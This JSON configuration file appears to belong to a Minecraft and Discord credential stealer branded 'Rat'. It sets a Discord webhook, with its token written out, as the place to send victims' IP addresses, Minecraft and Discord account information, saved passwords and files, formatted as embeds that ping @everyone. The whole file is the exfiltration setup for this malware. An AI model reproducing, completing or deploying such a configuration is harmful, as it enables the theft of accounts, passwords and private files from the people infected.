{
  "webhook": "https://discord.com/api/webhooks/1220491368208666691/FgucZHBgfqtEUNwlwD1o_g4GQji5BhZODf42rSgmsgQL0dosZrqzvMx8KAjkhx79N18C",
  "webhook_name": "webhook",
  "webhook_avatar": "https://cdn.discordapp.com/embed/avatars/0.png",
  "message": "@everyone %IP%",

  "codeblock_type": "small",

  "ip_ratelimit": 3,
  "reset_ratelimit_after": 10,

  "mc_embed_color": "FF66CC",
  "mc_embed_title": "Minecraft Info",
  "mc_embed_footer_text": "Rat",
  "mc_embed_footer_icon": "https://bigrat.monster/media/bigrat.png",


  "discord_embed_color": "FF66CC",
  "discord_embed_title": "Discord Info",
  "discord_embed_footer_text": "Rat",
  "discord_embed_footer_icon": "https://bigrat.monster/media/bigrat.png",


  "password_embed_color": "FF66CC",
  "password_embed_title": "Passwords",
  "password_embed_footer_text": "Rat",
  "password_embed_footer_icon": "https://bigrat.monster/media/bigrat.png",

  "file_embed_color": "FF66CC",
  "file_embed_title": "Files",
  "file_embed_footer_text": "Rat",
  "file_embed_footer_icon": "https://bigrat.monster/media/bigrat.png",

  "validate_session": false,
  "networth_api": ""
}
